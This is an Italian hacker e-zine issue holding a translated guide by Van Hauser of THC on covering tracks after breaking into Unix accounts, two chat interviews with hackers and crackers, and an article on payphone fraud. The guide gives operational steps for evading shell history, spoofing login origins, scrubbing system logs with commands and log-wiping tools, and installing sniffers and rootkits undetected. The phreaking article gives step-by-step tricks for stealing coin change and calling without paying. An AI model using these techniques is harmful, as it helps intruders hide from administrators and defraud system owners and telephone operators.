ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³A HACKER [by Van Hauser of THC (=The Hackers Choice)](tradotto da Wurz)³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Autore: Van Hauser/THC Traduttore: WURZ - Freedom Fighter [WURZ says: molte definizioni le ho lasciate in lingua originale, sia perche' si capiscono di piu' e velocemente (es.: shell = conchiglia), sia perche' "suonano" meglio (es.: sysadmin = amministratore di sistema)] I. IL PRIMO COMANDO Il primo comando che devi inviare dopo essersi registrati con un account hackerato e' quello di una shell differente da quella di login in cui si sta al momento lavorando. Lo scopo e' quello di disabilitare la cronologia dei comandi inviati mentre si sta hackando. Un check cronologico da parte del vero utente o del sysadmin rivela la tua presenza e cio' che hai fatto!! Se stai facendo funzionare un CSH allora esegui uno SH e viceversa. $ % <- questo e' un prompt SH <- questo e' un prompt CSH Se non assomiglia ai prompt standard sopra descritti, allora esegui SH. Se il prompt rimane uguale, digita "exit" ed esegui il CSH ... La ragione per usare queste due shells e non bash, ksh, zsh, ecc. e' che queste due sono semplicemente senza opzioni extra abilitate per default (come la cronologia). II. METODO LASTLOG Se vedi un testo tipo "Last successful login from alpha.master.mil" quando ti logghi con un account hackato e non puoi hackare la root o non vuoi disgregare i system logs cancellando i dati, allora esegui il seguente : "rlogin" e se necessario inserisci nuovamente la password dell'account hackato. Dopo aver visto il prompt digita "exit" per tornare ancora. Questo cambiera' l'header "Last login from ..." ecc. in "localhost" che e' molto meno sospettoso di "site.real.user.never.saw.com". Naturalmente hai bisogno di fare questo solo se il tuo host d'origine puo' attirare l'attenzione per l'utente e/o il sysadmin. III. METODO CHI Dopo aver completato i passi I e II digita "w" ...vedrai tutti gli attuali utenti online... con l'indirizzo da cui si sono loggati. Ancora una volta qualcosa come il tuo host d'origine OLANDESE sara' molto sospettoso agli utenti e/o al root se il sito si trova negli STATI UNITI. Se non puoi hackare la root o ancora una volta non vuoi manomettere i files di log puoi provare un bug che funziona ancora anche per molti unix aggiornati: basta eseguire "login" con la stessa login+password. Digita nuovamente "w" e, se ha funzionato, la tua origine sara' cambiata in qualcosa come "tty05". Naturalmente hai bisogno di fare cio' solo se il tuo host d'origine puo' attirare l'attenzione degli altri utenti e/o del sysadmin. IV. ESEGUIRE PROGRAMMI Non eseguire programmi con nomi sospetti ...ISS e YPX sono per esempio molto sospetti, ed un admin capace sa quello che sta succedendo se vede un utente che sta usando "loadmodule SandraBullok" sul suo Sun... ;-). Puoi sia copiare e rinominare i comandi sia usare i sources che cambiano il nome del comando nella lista d'elaborazione. A proposito, la lista d'elaborazione puo' essere testata da "ps -ef" o "ps -auxwww" e il comando attuale che ogni utente sta eseguendo con "w" e la maggior parte delle elaborazioni CPU con "top" ...cosi' e' veramente facile monitorare i programmi che l'utente(i) sta usando. V. ESEGUIRE TELNET Ci sono solo due cose che dovrebbero essere dette riguardo all'uso di telnet per scopi hacker (per esempio fare un telnet al prossimo target). Innanzitutto MAI digitare "telnet target.host.com". Digitare "telnet" e poi "open target.host.com" che non sara' visualizzato come parametro nella lista d'elaborazione. La seconda cosa e' che certi clients telnet esportano variabili ambientali. E se il tuo hack e' scoperto e possono rintracciare la connessione fino al tuo host originario, possono pure avere l'account che hai usato sul tuo host originario. Cosi' ridefinisci (in qualsiasi cosa tu voglia) le seguenti variabili ambientali prima di cominciare telnet, rlogin o simili: USER, LOGNAME, UID, HOME, MAIL - forse dovresti fare anche un "cd /tmp" per cambiare la variabile PWD... Per cambiare queste variabili: SH : <variabile>=<nuovo_valore>;export <variabile> esempio: USER=nobody;export USER CSH: setenv <variabile> <nuovo_valore> esempio: setenv USER nobody e non dimenticare di resettare le variabili dopo aver telnettato se vuoi fare qualcosa con l'account prima di fare log out. VI. RIMUOVERE I TUOI FILES Quando hai fatto la tua impresa - con o senza successo - cancellala immediatamente dopo averla provata - specialmente se li hai provati in /tmp! Nulla e' piu' interessante che curiosare nella directory /tmp per vedere cio' che gli altri utenti stanno facendo... Se veramente hai bisogno di lavorare nella directory temp (perche' SUID si e' infilato nella tua home dir) allora crea una directory come ".X11", e dalle l'abilitazione 711. Ricorda, se qualcuno curiosa nelle directory mentre stai hackando, o perdi la connessione e non puoi piu' re-loggarti oppure dimenticane perche' sei in guai grossi. --> ! I seguenti 2 punti sono possibili solo con un accesso root ! <-- VII. MODIFICARE I LOGS Importanti files di log sono LASTLOG, WTMP e UTMP. Se hai avuto successo a hackare la root allora dovresti modificarli. Di solito possono essere trovati in /etc, /var/adm o /var/log ...dipende, prova le pagine principali. Quali tools dovresti usare? ZAP (o ZAP2) e' carino, ma NON ti cancella dai logs, bensi' sovrascrive i contenuti con zeri. CERT ha gia' pubblicato dei tools che testano facilmente i logs per questi contenuti sovrascritti. E nulla piu' di questo urla "Hey, c'e' un hacker con accesso root nel sistema" in faccia al sysadmin. Importante per ZAP: controlla il percorso per i logs definito nei sources! Prova CLOAK2 che puo' cambiare la data d'importanti campi di dati ;-) ma non compila su tutti i tipi do OS unix. Puoi pure provare CLEAR, incluso in questa rivista [WURZ says: sfiga, dovete cercarlo da un'altra parte ;-)], che cancella VERAMENTE gli entries... ;-) VIII. SYSLOG & LASTCOMM Dovresti pure cercare nel logfile di messaggi syslog se forse vi sono contenute le entries con il tuo account hackato o il tuo host originario. Di solito e' localizzato in /var/adm o in /var/log ...generalmente e' chiamato "messages" ma puo' essere diverso - e cerca anche altri logfiles generati da messaggi auth.* e authpriv.* (e naturalmente xferlog ecc.). Cerca il file /etc/syslog.conf per vedere il file giusto e prova cos'e' loggato con quel file/programma/mail/utente. Se vedi qualcosa come "@loghost" e scopri il tuo host d'origine nel file messages allora hai un problema. E' pure loggato ad un altro sito che per la maggior parte del tempo non e' accessibile da remoto. Ma prova ad installare uno sniffer (vedi la sezione IX!) e guarda se un root riesce a fare un login al loghost - allora avrai pure la password per quell'host e potrai gestire il problema ;-). Per esempio, per rimuovere il tuo hostname dal logfile "messages" esegui: "grep -v evil.host.com messages > /tmp/tmpfile; mv /tmp/tmpfile messages" LASTCOMM (dalla accton ecc.) e' un tool per loggare tutti i comandi eseguiti, con una flag se il file eseguito aveva settata la flag SUID e se un comando e' stato eseguito da root. Puoi trovare questo logfile nella stessa directory del file syslog. E' veramente un tool cattivo verso gli hackers ma - fortuna! - la maggior parte delle volte non e' installato. Ma ora non devi piu' averne paura :-) Procurati l'eccellente ACCT Cleaner di Zhart e prova la liberta' ;-) IX. INSTALLARE TROJANS Quando installi uno sniffer, ricorda che chiunque puo' eseguire "ifconfig -a" per vedere se la scheda e' in modo promiscuo. Prendi un rootkit per il tuo OS unix e sostituiscilo. Esegui fixer.c su di esso per il corretto checksum e data/orario ma prova prima il tuo account root se forse tripwire o altri checker binari sono installati! Ricordati di cio' per ogni binario che sostituisci. Se il tuo binario e' in una directory che e' montata su una NFS e non puo' essere rimontata in write mode, allora devi prima hackare l'host NFS - a volte la vita non e' facile ;-) X. FINE Spero ti sia divertito ed abbia imparato qualcosa da questo testo. Per aggiornamenti, tips, trucchi, ecc., mandami un'e-mail a [email protected]. Ricorda: mai impigrirti. Ogni cosa deve essere fatta al 100% - o affronta le conseguenze. ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°ÛÛ°ÛÛ°°°°ÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛÛÛ°ÛÛ°°°°°°°ÛÛ°ÛÛ°ÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛ°² ²°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ²²²ÛÛ°°ÛÛ°°°°°ÛÛ°°ÛÛ°ÛÛ°°°°°°°°°ÛÛ°°°°ÛÛ°°°°°°² ²°ÛÛ°ÛÛ°ÛÛ°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°ÛÛÛÛÛÛÛ°°°ÛÛ°°°ÛÛ°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°°°² ²°ÛÛ°ÛÛ°°ÛÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°ÛÛ°°°°°°ÛÛ°ÛÛ°°°°ÛÛ°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°² ²°ÛÛ°ÛÛ°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°ÛÛ°°ÛÛÛ°°°°°ÛÛÛ°°°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛÛÛ°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ» ÌÍÍ͹ INTERVISTA A UN HACKER/PHREAKER ÌÍÍ͹ ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ <N0bodY88> Che computer hai avuto nella tua vita? <SoulDestroy> Commodore Vic16 , Vic20 , C64 , C128 , Apple IIC , 8086 , 286 , <SoulDestroy> 386 , P90, <SoulDestroy> P166 Piu' lo spectrum e Amiga 500-600-1200 ... <N0bodY88> Quando hai iniziato ad appassionarti oltre ai giochi sulla <N0bodY88> sicurezza, reti e doppini? <SoulDestroy> Verso i 10 anni o giu' di li , complice un mio caro amico che <SoulDestroy> viveva facendo reti e smanettava sul telefono per hobby... <N0bodY88> Sei mai stato preso/bustato/binato? <SoulDestroy> Si' , per la storia delle BBS che davano software pirata , ma la <SoulDestroy> mia bbs di software pirata non ne aveva... <SoulDestroy> A parte quel piccolo dettaglio , mi sono stati messi i sigilli <SoulDestroy> a tutto quello che c'era attaccato al computer , compreso il <SoulDestroy> telefono di servizio del modem.... <N0bodY88> Di che gruppo hai fatto parte? <SoulDestroy> Nessuno , mai gruppi ma solo amici che si riunivano e parlavano, <SoulDestroy> l'idea del gruppo non e' mai emersa... <N0bodY88> Di cosa ti interessi principalmente? <SoulDestroy> Tutto e nulla , da customizzare windows a Linux , dall'uso di VB <SoulDestroy> a come riciclare un 486 per farlo diventare proxy ... <SoulDestroy> N'somma , smanetto su tutto , faccio un sacco di cose e spesso <SoulDestroy> imbrocco anke la soluzione giusta.... <N0bodY88> Cosa ti da' + soddisfazione ora nella vita (diventare root o <N0bodY88> trombare...hihihi)? <SoulDestroy> Se sono solo , propenderei per il root , se sono con la ragazza, <SoulDestroy> trombare ..... <SoulDestroy> Se poi (e un giorno provo,,,,) divento root trombando mi sa che <SoulDestroy> e' il massimo.... <N0bodY88> hihihi si potrebbe dire di avere "goduto" diventando root! hihihi <N0bodY88> Quali sistemi conosci? <SoulDestroy> Dos , Win , Linux , ed ho una buona base di Iris <N0bodY88> <HIHIHI>Ci diresti cosa mangi/bevi/fai di sport/guardi alla tv/ x <N0bodY88> sapere come farci diventare tutti hacker?</HIHIHI> <SoulDestroy> Mangio dolci in quantita' pressoche' industirale , bevo acqua e <SoulDestroy> lemon shwepps, come sport non faccio nulla (ma se trombare e' <SoulDestroy> uno sport...) la tv ho smesso di guardarla da 3 anni circa, mi <SoulDestroy> annoiava essere passivo , il pc era meglio... <SoulDestroy> Per diventare hacker bisogna passare un bel pokino di tempo a <SoulDestroy> studiare , poi provare in locale , poi avere amici che studiano <SoulDestroy> come te e confrontarsi spesso con loro ... <N0bodY88> So che tu fumi (si parla di sigarette...l'articoletto sul negozio <N0bodY88> L'erba voglio di Spinellone ci sara' in un prox numero...hihihi), <N0bodY88> ma quanto? <SoulDestroy> Quando non sono al computer fumo poco , se sono dietro al <SoulDestroy> monitor non mi accorgo di avere una sigaretta accesa, infatti <SoulDestroy> ormai la mia tastiera e' piu' carica di cenere che i miei <SoulDestroy> posacenere.... <N0bodY88> E oltre al pc , che hobby hai ? <SoulDestroy> La musica , adoro il metal .. <SoulDestroy> E poi ho il cb e mi diverto da matti con gli amici , tutti <SoulDestroy> davanti al pc , tutti con la radio accesa ed il microfono in <SoulDestroy> mano.... <N0bodY88> Adesso io devo stakkare <N0bodY88> Ci risentiamo cmq okki? <SoulDestroy> ok a presto allora :) <N0bodY88> Come intervista credo che possa andare bene.. voi che ne dite? ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍ» ÌÍÍ͹ INTERVISTA A UN EX CRACKER ORA HACKER ÌÍÍ͹ ÈÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍͼ <N0bodY88> Allora che ne dici di cominciare? <DaVinci> ehehehh <N0bodY88> quando ti sei appassionato ai computer? <DaVinci> avevo circa 11 anni <DaVinci> ed ero in possesso del mio primo computer <DaVinci> un commodore 64 <DaVinci> :-)))) <N0bodY88> mitico!!! <N0bodY88> hai cominciato subito a programmare o prima giocavi? <DaVinci> i giochi non mi attiravano tanto <DaVinci> almeno in quel momento <DaVinci> usavo il computer solo per conoscere qualche programmino <DaVinci> cercavo di capire come potesse funzionare <DaVinci> ripeto che avevo solo 11 anni <N0bodY88> hai cominciato tardi eh...hihihi <N0bodY88> fin da subito ti appassiono' il computer? <DaVinci> ero curioso <DaVinci> no, i primi due anni <DaVinci> li passai a rovistare all'interno del commodore <DaVinci> ehehhe <DaVinci> dopo due anni <DaVinci> ho iniziato a conoscere un certo Bombadil <DaVinci> li pero' avevo gia' un 486 <DaVinci> con un modem da 2400 <DaVinci> eheeh <DaVinci> sembra un museo <N0bodY88> hihihi <DaVinci> mi collegavo alla BBS di Pier <DaVinci> dove c'era pure Master <N0bodY88> Master? ah si' forse ne ho sentito parlare hihihi <DaVinci> che io non conoscevo <DaVinci> da li si cominciava a capire che c'era un mondo <DaVinci> molto simpatico dove imparare <N0bodY88> ma le cose che + ti colpirono cosa furono? <DaVinci> le bbs <DaVinci> erano un libro universale <DaVinci> dove trovavi informazioni e prg di ogni genere <DaVinci> non conoscevo ancora fidonet e itapac <N0bodY88> quali furono i tuoi primi amici in rete, ti ricordi i nomi? <DaVinci> si <DaVinci> c'era Maverick <DaVinci> Hackerjack <DaVinci> tuttora mio amico <DaVinci> e altri che ancora non ricordo <DaVinci> Maverick era di Pisa <DaVinci> Hackerjack di Bs <DaVinci> bazzicavo pure la BBs di DragonFly <N0bodY88> ma il salto dall'usare i pc x programmare/giocare/leggere <N0bodY88> all'usarli x fare cracking/phreaking/hacking quando avvenne + o -? <DaVinci> 10 anni fa' <N0bodY88> o chi ti convinse <DaVinci> non mi convinse nessuno <DaVinci> un giorno mi misi a giocare con un giochino stupido <DaVinci> e non riuscivo a passare un livello <DaVinci> allora ho cercato di capire come potevo bypassarlo <DaVinci> fu cosi' che provai a smontarlo <DaVinci> e cercai di capire dove e come iniziava a bloccarmi <N0bodY88> mitico! e ci riuscisti? <DaVinci> usando un programmino che adesso sinceramente non ricordo <DaVinci> l'ho crakkato in tre giorni <DaVinci> ci passavo circa 4/5 ore a giorno <N0bodY88> il tuo primo crack vero? <DaVinci> si <DaVinci> e' stato bellissimo <DaVinci> :-)) <DaVinci> era come riuscire a mettere una bandierina sulla vetta di una <DaVinci> montagna sconosciuta a tutti <DaVinci> e' dall'ora <DaVinci> che ho iniziato a smontare prog e giochi <DaVinci> poi quando e' uscito Softice <DaVinci> tutto si e' reso piu' semplice <DaVinci> caricavi il programma <DaVinci> e quando si bloccava per il numero seriale <DaVinci> o per richiesta di password <DaVinci> entravo in softice <DaVinci> e li iniziava il lavoro di salti <DaVinci> ehehehe <N0bodY88> eheheh <N0bodY88> ma lo facevi x passione, x sfida, x soldi <N0bodY88> qual'era il motivo principale? <DaVinci> no, non per soldi <DaVinci> era uno stimolo a dover per forza riuscire a liberare un prog <DaVinci> dal vincolo delle seriali <DaVinci> o password <DaVinci> il nick Misha <DaVinci> era gia' presente ancora quando crakkavo <DaVinci> perche' non potevo mettere il mio vecchio nick <DaVinci> se tu per caso fai una ricerca su astalavista <DaVinci> e digiti Misha <DaVinci> te ne rendi conto <DaVinci> molti prog <DaVinci> sono stati crakkati <DaVinci> perche' quando entrai nei Pc <DaVinci> c'era un motto <DaVinci> riuscire a crakkare determinati programmi <DaVinci> solo dopo ti facevano entrare <DaVinci> era come una prova <N0bodY88> una specie di iniziazzione <DaVinci> si <DaVinci> ma non solo <DaVinci> loro si studiano il metodo che tu hai usato <DaVinci> e cercano di capire se c'era un'altro modo per poterlo fare <DaVinci> solo dopo ti convocavano <DaVinci> e ti davano la "benedizione" <DaVinci> :-))) <N0bodY88> tu in quanti e quali gruppi sei stato? <DaVinci> a parte i PC <DaVinci> ero negli Angelz <DaVinci> non so se li hai sentiti ancora <DaVinci> il quartier generale era in inghilterra <DaVinci> ma ci sono stato solo pochi mesi <DaVinci> loro crakkavano per scopo di lucro <DaVinci> e a me non andava COMMENTO FUORI INTERVISTA: e poi gli hacker non avrebbero un etica... <DaVinci> ho passato anche due anni su galactica <N0bodY88> poi cosa e' successo? non ti piaceva + crackare? <DaVinci> no il fatto di crakkare richiedeva molto tempo <DaVinci> e molta dimestichezza con prog relativi al crakkaggio <DaVinci> percio' gia' conoscevo un'hacker Bombadil <DaVinci> e lo seguii per circa sei mesi <DaVinci> riuscii a capire come fungevano gli exploit e vari sendmail <DaVinci> tutto cio' che puoi utilizzare per l'hackeraggio <DaVinci> era il 1984 <DaVinci> quando una notte <DaVinci> mi collegai e cercai di bucare un sistema <DaVinci> in 10 minuti ero riuscito ad entrare in una rete itapac <DaVinci> collegata a Banche <DaVinci> mi stupii <DaVinci> per il semplice fatto che riuscii ad entrare in un battibaleno <DaVinci> il fatto e' che era una trappola <DaVinci> ripeto che ero riuscito ad entrare <DaVinci> solo che non conoscendo bene il sistema UNIX <DaVinci> mi buttavo a caso <DaVinci> conoscevo pochi comandi <DaVinci> il tutto era durato circa 20 minuti il tempo di ritrovarmi <DaVinci> a conversare con certa gente della polizia Postale <DaVinci> ero diventato bianco come un cadavere <DaVinci> mia madre che mi diceva che cosa potessi aver fatto... <DaVinci> ed io che ripetevo niente niente <DaVinci> :-))) <DaVinci> insomma dopo tre ore di conversazione <DaVinci> mi hanno riportato a casa <DaVinci> sequestrato il pc completo di manuali e modem ecc. ecc. <DaVinci> mi hanno pure detto <DaVinci> che se ci riprovavo potevo finir male <DaVinci> al momento mi chiedevo <DaVinci> come mai non mi portavano dentro o qualche multa <DaVinci> l'indomani aspettavo la notizia sul giornale <DaVinci> contento del fatto <DaVinci> ma invece quegli stronzi non dissero nemmeno una parola <DaVinci> forse per la mala publicita <DaVinci> cmq sta' di fatto che tutt'ora <DaVinci> quando succede qualche evento del genere <DaVinci> mi vengono a prendere e mi portano sul posto per <DaVinci> capire in che modo possono aver bucato il sistema <DaVinci> parlo sempre di banche <DaVinci> conosco parecchi della gf che operano nel campo dell'informatica <DaVinci> che danno la caccia a pirati o hackers <DaVinci> solo che li ho visti all'opera una volta <N0bodY88> secondo te sono bravi? <DaVinci> in confronto il mio cane bekka piu' gatti di loro <DaVinci> eheheheh <N0bodY88> hihihihi <DaVinci> eheheheh <N0bodY88> hihihihi <N0bodY88> dopo quel fatto ti 6 preso subito un altro computer? <DaVinci> beh non subito, visto che mio padre mi aveva vietato l'uso <DaVinci> in casa pero', c'era sempre il mio caro e vecchio amico HJ. <N0bodY88> l'essere stato preso e' stato uno stimolo a migliorarti o a <N0bodY88> lasciare stare? <DaVinci> diciamo che piu' che stimolo, ebbi la consapevolezza di agire ma <DaVinci> con cautela, tante volte ancora bucai sistemi, ma sempre con un <DaVinci> occhio alla finestra...eheheheh <N0bodY88> da quella volta hai + avuto problemi con pulotti et similari? <DaVinci> ripeto che ogni tanto ricevo visite, poi ultimamente mentro ero <DaVinci> on line, mi son visto pingare da uno strano ip,dopo una ricerca <DaVinci> ho capito che ero in logstatus su un sistema di GF.. <N0bodY88> se in questo momento qualcuno ti chiedesse di fargli da guida per <N0bodY88> diventare un cracker esperto, cosa gli risponderesti? <DaVinci> Mah, sinceramente con i tempi che corrono adesso, gli direi di <DaVinci> lasciar perdere, poi l'etica e' sempre in primo piano. <N0bodY88> che so sai usare? che linguaggi conosci? <DaVinci> Beh, i Sistemi operativi sono come le dita di una mano <DaVinci> mentre i linguaggi sono una giungla, io personalmente <DaVinci> uso W98, poi Nt4, e Linux , linguaggi Vb, C++, pascal. <N0bodY88> quali sono i tuoi obbiettivi ora? <DaVinci> Starmene un po' tranquillo, cercare di leggere cio' che mi sono <DaVinci> perso in passato <N0bodY88> i tuoi amici lo sanno quello che fai? <DaVinci> Uno Solo, Hackerjack, gli altri pensano che sia solo un tecnico di <DaVinci> computer, :-)) <N0bodY88> dicci qualcosa su di te, cosa vesti, come la pensi del mondo... <DaVinci> Beh, sono sposato da un'anno e mezzo circa, mi vesto normalmente <DaVinci> con jeans e camicia, e giacca e cravatta quando serve. <DaVinci> Il mondo e' una scatola piena di risorse, dove ognuno di noi <DaVinci> puo' accedervi, trattare male il mondo significa trattare male <DaVinci> il tuo prossimo, l'unica cosa che il mondo non puo' darmi <DaVinci> e' il mio passato. <N0bodY88> adesso devo scappare <N0bodY88> grazie 1000 della favolosa intervista concessami :)))) <DaVinci> E' stato un piacere, see you later Alligator :-))) <N0bodY88> byez allora ø__ø <DaVinci> See ya.....By 1984 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°ÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛ°°°ÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°² ²°°ÛÛ²²²ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ²²²²ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°² ²°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛÛÛÛ°°°°ÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°² ²°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°ÛÛÛ°°°ÛÛ°°°°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°² ²°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛ°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ TELEFONARE GRATIS ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Telefonare Gratis Autore: Fusyllo Consumo: 1 lattina di CocaCola Musica ascoltata: (la prima che mi viene) Sweetest Thing U2 Dedicato: a tutti quelli telefonare gratis Allora cominciamo... Questa e' la prima volta che scrivo su una e-zine. In Italia la possibilita' di telefonare gratis si sta' riducendo molto, infatti, molte tecniche che per telefonare gratis non funzionano piu'! :-(( Il famoso trucco dello scotch, che consiste nell'attaccare sulla banda magnetica dello scocth in modo che il telefono non possa scrivere pero' in questo modo non potrebbe neanche leggere no? La tessera passata su di un vecchio televisote? Non funzionera' mai ! Anche se, la scheda, essendo magnetica, il televisore modifichera' molto probabilamente il contenuto ma in che modo?? Altre balle sono: passare la scheda sulla testina di un registratore a bobine o su quella del commodore64 con il pulsante REC premuto. Si dice che la Telecoz abbia un enorme data base dove siano registrati tutti i seriali delle schede e che l'importo della scheda non sia scritto sulla scheda ma in questo database. Non credo che esista veramente; i primi telefoni a scheda si poteva frekare spingeno il tasto di reset (non piu' accessibile) con una scheda telefonica alla fine della conversazione in questo modo la scheda usciva carica come prima perche' l'importo viene cancellato solo alla fine della conversazione (quando si chiude la cornetta). Questo potrebbe significare che non c'e' nessun database se non e' stato aggiunto in seguito!! Queste tecniche funzionano tutte (almeno nel momento in cui scrivo): 1.Dovete prendere una scheda vuota (se piena caxxi vostri) e piegarla in quattro in questo modo: _____________________ | | | | | | | Prima | | | | | | | |_____________________| ___________ | | | | | Dopo | |___________| Trovate un telefono che vada ancora a monete. Osservando il vano da dove esce il resto si nota che le monete non escono da sopra come si potrebbe pensare ma dal lato sinistro del vano cosi' voi prendete la vostra scheda piegata in quattro e la in filate nel buco, (vi potete aiutare con una pinza con il beccuccio storto); in questo modo il resto non cadra' nel vano ma rimarra' nello scivolo di sinistra. ____________________________________________________ | | | | | | | | | | | | | | | | | | | | | _________________ | | | | | | | | \ __\___| | | | \ |SSSSSS| | | | \ |SSSSSS| | | | \|SSSSSS| | | | -------|_________________| | | S=scheda | | | | | |____________________________________________________| Cosi dopo qualche ora passate e ritirate la mancia. 2.Un altro modo per telefonare per molto tempo usando una tessera vuota e una con solo 200œ e' questo: inserite la tessera piena e la scheda vuota il piu' dentro possibile. Componete il numero e quando la tessera si esaurira' verra' espulsa e il telefono cerchera' anche di ritirare la scheda vuota che terrete ferma con un dito affinche' il telefono non la prenda, nel frattempo la telefonata continua e voi parlate pagando solo 200, quando finite la conversazione (se la finirete :-D) basta riagganciare la cornetta e ritirare le schede. 3.Questa tecnica dovrebbe fare in modo che la tessera entri piu' dentro del dovuto facendo leggere la banda magnetica ma non facendola scrivere. Dovete inserire la scheda carica e comporre il numero, senza fretta e con attenzione a non far accavallare le schede, inseritene due vuote una dietro l'altra. L'importo continuera' a scendere e siccome la tessera verra' scritta solo alla fine della telefonata il telefono scrivera' su quella vuota. Non tentate di farvi le monetine false, non funzioneranno, il telefono oltre a riconoscere il peso e la dimensione riconosce anche la lega!! Scordatevi anche la monetina con il filo perche' c'e' un sistema a ghigliottina che una volta entrata la moneta non esce piu'. Questo articolo per ora e' giunto a conclusione ma nel prossimo numero parlero' ancora di phreaking. [email protected] Fusyllo 